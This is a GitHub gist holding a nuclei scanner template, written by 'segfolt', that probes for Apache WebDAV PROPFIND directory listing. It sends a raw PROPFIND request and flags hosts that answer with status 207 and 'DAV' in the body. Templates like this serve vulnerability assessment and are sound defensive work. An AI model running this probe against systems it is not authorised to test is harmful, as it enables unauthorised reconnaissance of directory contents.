Last active
December 18, 2023 06:50
-
-
Save ihebski/9f90f368ed793a5325f728d7f3e952b4 to your computer and use it in GitHub Desktop.
nuclei template for Apache WebDAV Module PROPFIND Arbitrary Directory Listing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: apache-webdav-dir-listing | |
info: | |
name: Apache WebDAV Module PROPFIND Arbitrary Directory Listing | |
author: segfolt | |
severity: Medium | |
# https://vuldb.com/?id.16000 | |
requests: | |
- raw: | |
- | | |
PROPFIND / HTTP/1.1 | |
Host: {{Hostname}} | |
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Connection: close | |
Upgrade-Insecure-Requests: 1 | |
matchers-condition: and | |
matchers: | |
- type: status | |
status: | |
- 207 | |
- type: word | |
words: | |
- "DAV" | |
part: body |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment